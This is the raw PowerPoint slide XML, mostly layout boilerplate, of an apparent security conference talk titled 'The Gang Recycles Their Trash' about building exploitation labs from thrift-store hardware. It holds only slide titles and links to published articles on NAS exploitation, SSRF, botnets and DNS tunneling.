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Lst>
  <p:sldIdLst>
    <p:sldId id="288" r:id="rId2"/>
    <p:sldId id="309" r:id="rId3"/>
    <p:sldId id="281" r:id="rId4"/>
    <p:sldId id="289" r:id="rId5"/>
    <p:sldId id="290" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="291" r:id="rId8"/>
    <p:sldId id="294" r:id="rId9"/>
    <p:sldId id="295" r:id="rId10"/>
    <p:sldId id="293" r:id="rId11"/>
    <p:sldId id="265" r:id="rId12"/>
    <p:sldId id="308" r:id="rId13"/>
    <p:sldId id="266" r:id="rId14"/>
    <p:sldId id="267" r:id="rId15"/>
    <p:sldId id="296" r:id="rId16"/>
    <p:sldId id="297" r:id="rId17"/>
    <p:sldId id="270" r:id="rId18"/>
    <p:sldId id="298" r:id="rId19"/>
    <p:sldId id="299" r:id="rId20"/>
    <p:sldId id="300" r:id="rId21"/>
    <p:sldId id="302" r:id="rId22"/>
    <p:sldId id="301" r:id="rId23"/>
    <p:sldId id="304" r:id="rId24"/>
    <p:sldId id="305" r:id="rId25"/>
    <p:sldId id="279" r:id="rId26"/>
    <p:sldId id="303" r:id="rId27"/>
    <p:sldId id="307" r:id="rId28"/>
    <p:sldId id="280" r:id="rId29"/>
    <p:sldId id="256" r:id="rId30"/>
    <p:sldId id="260" r:id="rId31"/>
    <p:sldId id="277" r:id="rId32"/>
    <p:sldId id="278" r:id="rId33"/>
    <p:sldId id="257" r:id="rId34"/>
    <p:sldId id="264" r:id="rId35"/>
    <p:sldId id="258" r:id="rId36"/>
    <p:sldId id="282" r:id="rId37"/>
    <p:sldId id="283" r:id="rId38"/>
    <p:sldId id="263" r:id="rId39"/>
    <p:sldId id="261" r:id="rId40"/>
    <p:sldId id="262" r:id="rId41"/>
    <p:sldId id="268" r:id="rId42"/>
    <p:sldId id="271" r:id="rId43"/>
    <p:sldId id="269" r:id="rId44"/>
    <p:sldId id="272" r:id="rId45"/>
    <p:sldId id="273" r:id="rId46"/>
    <p:sldId id="286" r:id="rId47"/>
    <p:sldId id="274" r:id="rId48"/>
    <p:sldId id="284" r:id="rId49"/>
    <p:sldId id="287" r:id="rId50"/>
    <p:sldId id="276" r:id="rId51"/>
    <p:sldId id="275" r:id="rId52"/>
    <p:sldId id="2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3" d="100"/>
          <a:sy n="73" d="100"/>
        </p:scale>
        <p:origin x="97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7DE7-E884-34E7-0A8B-5AA6EFC4AC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B32511-BB74-4D40-6482-64F33EE26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C1D34-CF02-21C0-6144-336E6246390A}"/>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14A1CA9F-4EC1-D1E6-A445-FCF080B454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AFE0EB-C5A9-FD63-DB47-1E79B299E83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636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B0EB-20F7-83F2-33E3-3C0D002720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6E102A-2E91-436F-BB1F-45D5281D2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73A80-02CE-EDC1-5974-91E22071AD40}"/>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2C342DD8-6D52-6268-1610-D96F2116D0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111B54-3310-472E-FCCF-F5D6491AE5A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705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07A1E-941C-0997-8755-3F36A0FF4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2AB8A9-B3B7-E9CE-12A3-180EBA35D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A6C69-122C-4794-7D30-9F7B0851712F}"/>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67500DC1-275E-34D0-065E-2F8F41BE00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179BB2-E277-1AE0-3C57-00AD86EA54B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41581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677788"/>
            <a:ext cx="10970378"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en-US" sz="2177" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Click to edit the title text format</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4169405" y="6246923"/>
            <a:ext cx="3862883" cy="471088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr lang="en-US" sz="1693" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8741122" y="6246923"/>
            <a:ext cx="2838818" cy="471088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="0" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr lang="en-US" sz="1693" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{58FD0959-B1D2-4D84-9E76-4DBE31AE140B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609562" y="6246923"/>
            <a:ext cx="2838818" cy="471088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr lang="en-US" sz="1693" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609562" y="1604399"/>
            <a:ext cx="10971249" cy="3976383"/>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en-US" sz="3870"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en-US" sz="3386"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en-US" sz="2903"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en-US" sz="2419"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284533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1">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677788"/>
            <a:ext cx="10970378" cy="335028"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2177" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Click to edit the title text format</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4169405" y="6246923"/>
            <a:ext cx="3862883" cy="471088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr lang="en-US" sz="1693" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&lt;footer&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8741122" y="6246923"/>
            <a:ext cx="2838818" cy="471088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="0" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr lang="en-US" sz="1693" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{E042B817-B0B8-42C6-95AD-4A40A4125911}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609562" y="6246923"/>
            <a:ext cx="2838818" cy="471088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr lang="en-US" sz="1693" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&lt;date/time&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609562" y="1604399"/>
            <a:ext cx="10971249" cy="3976383"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="522461" indent="-391846">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1714"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="432000" indent="-324000">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3870" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Click to edit the outline text format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1044922" lvl="1" indent="-391846">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1371"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3386" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Second Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1567382" lvl="2" indent="-348307">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1028"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2903" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Third Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2089843" lvl="3" indent="-261230">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="686"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2419" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Fourth Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2612304" lvl="4"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Fifth Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="3134765" lvl="5"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Sixth Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="3657226" lvl="6" indent="-261230">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="342"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2419"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217235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C0AA-8C32-6310-C3D1-0DFE746C1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9AB90-F859-550A-570E-4365324FD7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DC4EF-E3AF-4AE5-5191-316FC05823C0}"/>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897323B2-DD2D-1AF2-B1DF-E8BB14A165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F87F23-1D40-58C2-4A15-D74D2329312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9692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A87A-696F-3988-E5E0-1F15AFF87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378321-896D-3276-6E7A-576D82999C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106C2A-436F-810B-F96A-550C1B910CAE}"/>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96D5A553-244C-5113-BF86-77426B081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26BF85-1793-FA78-C79A-A62C7B5272B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51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D885-8179-9464-B62C-1A6AFFC6C5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7138A-C61B-3B37-E570-4360C0E6E8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1C2FC3-D02A-F2CB-3C46-D8D380838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288289-8622-DFC1-C095-1056425554D6}"/>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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB58A3E2-4EDF-3EF9-67C4-CB008E2B4F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59E1A19-3640-ADE1-073C-43192DBB019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61837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7FD5-B756-6AB6-DCB4-5BE7506ED5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2C932-467B-3743-EE30-B19E0FF95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6105A-176F-DFFF-C9C3-20864BB378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B764A-0365-0BF2-6E31-931C08402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6EBFFC-AC84-C215-2500-D35EA7FD70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8D5248-5A28-0E14-AC9D-B1FC4FDC80FC}"/>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8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48D7983B-7C1F-CFD8-CA8E-DDB2A934E4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6FC44D2-6230-7EE3-B32B-EF520363621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4693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B43E-3769-3628-79ED-5F22BB280F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418659-E016-39FA-18D9-B7F222EE98FA}"/>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4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30E126DA-5199-9634-084A-B630369EE5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93D012-7C65-B14F-E76F-8761C2D6B34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901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3E36E0-B57F-C940-35CE-DE9A90FF4A84}"/>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3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34852339-7E19-4D7B-B088-6ED837FAE0E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26AA5D-3C88-F861-13CD-5CDBAE81066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8561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2DB8-94FE-36A3-5B74-0A01A8646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156B1E-65C2-CA4A-9A5F-A79B90B27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BBF6CE-A226-EB15-EBF3-E133C9C1C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798F0-5F02-FF82-906A-F0C44F5DFE0C}"/>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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F0D5BBA-9C83-0D8C-B8C5-9E091DE900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FF6FF2-3057-B36F-9683-ADD48E7CF58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4730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DD2D-AB50-5237-7EF5-294EF80E7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C4D639-F6C3-BD99-B542-D5D26AB74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FD7EAF-DA0F-EFB0-A0AA-9459DE4A7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9613E-D7B9-AD78-8735-18E731E738A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C764DE79-268F-4C1A-8933-263129D2AF90}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/8/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A900980A-C164-4EB6-B73A-10FA3DB154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87FCED-13F4-19FD-836F-6B66E6DC899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72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C1936-CC07-3E74-52E7-7338B3475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302E6-97D6-49B4-7BF2-A2A43099E5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26BFB-5928-A736-2C05-1C323A02C4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8/8/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B488CD94-F628-7BFE-153F-8E956ACAB8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FB225F-FB62-AC83-1454-B38988540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3312149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wizcase.com/blog/hack-2018/"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www.google.com/search?client=firefox-b-1-d&amp;sca_esv=3b7e4dc23e2c7901&amp;q=server-side+request+forgery&amp;sa=X&amp;ved=2ahUKEwj7p7bBpu2OAxWJrYkEHTRdICwQxccNegQICRAB&amp;mstk=AUtExfDqSEkCcNjkk2NFO3N2XvqRJY-Xzes_FwoYM_G9xOz8xfKYLAkcNYyqUHVKg43tONtayFfwfdRkLKWjlHy0oV5hV1Ba7rJMeuD2dwKdEKExjvyCQcQ7mcNKFxHwea7HvWn2UAZDRBJhXGDJdefZLQf4ey0GOqtTLlefqTLiIJHB5qCDRfxogiIofBAvahgIPLVH&amp;csui=3"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ensys.com/blog/cve-2018-18472-western-digital-my-book-live-mass-exploitation"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penwrt.org/toh/seagate/goflexhome" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.seagate.com/support/kb/how-to-manually-update-firmware-on-a-wireless-plus-or-goflex-satellite-005993nl/"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SYNgularity1/defcon-iotvillage-seagat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cuments.westerndigital.com/content/dam/doc-library/en_gb/assets/public/wd/product/nas/my_cloud/ex2_ultra/user-manual-my-cloud-expert-series-ex2-ultra.pdf" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.thestateofme.com/2022/10/26/socks-proxy-ssh-tunnels-on-openwrt/"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www.trendmicro.com/en_us/research/25/a/iot-botnet-linked-to-ddos-attacks.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extrahop.com/blog/detecting-suspicious-dns-behavior/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.extrahop.com/resources/attacks/c-c-beaconing/"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cloudns.net/blog/dns-tunneling-attack-what-is-it-and-how-to-protect-ourselves/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.extrahop.com/resources/attacks/dns-tunnel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2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3067701" y="3023907"/>
            <a:ext cx="5458874" cy="2729002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553155" y="1685040"/>
            <a:ext cx="10969994" cy="1126590"/>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ea typeface="Microsoft YaHei"/>
              </a:rPr>
              <a:t>“The Gang Recycles Their Trash*”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5321" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Microsoft YaHei"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Building Elite Skills and Exploitation Labs from equipment found at the Thrift Store!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14811461-ED40-1398-A4A5-776362135825}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2221706" y="5965186"/>
            <a:ext cx="7572375" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="squar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p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="975044" y="1368855"/>
            <a:ext cx="10069180" cy="5217234"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="829625" y="439160"/>
            <a:ext cx="10969994" cy="818814"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="2612304"/>
            <a:r>
              <a:rPr lang="en-US" sz="5321" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Password Protected?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p:nvPr/>
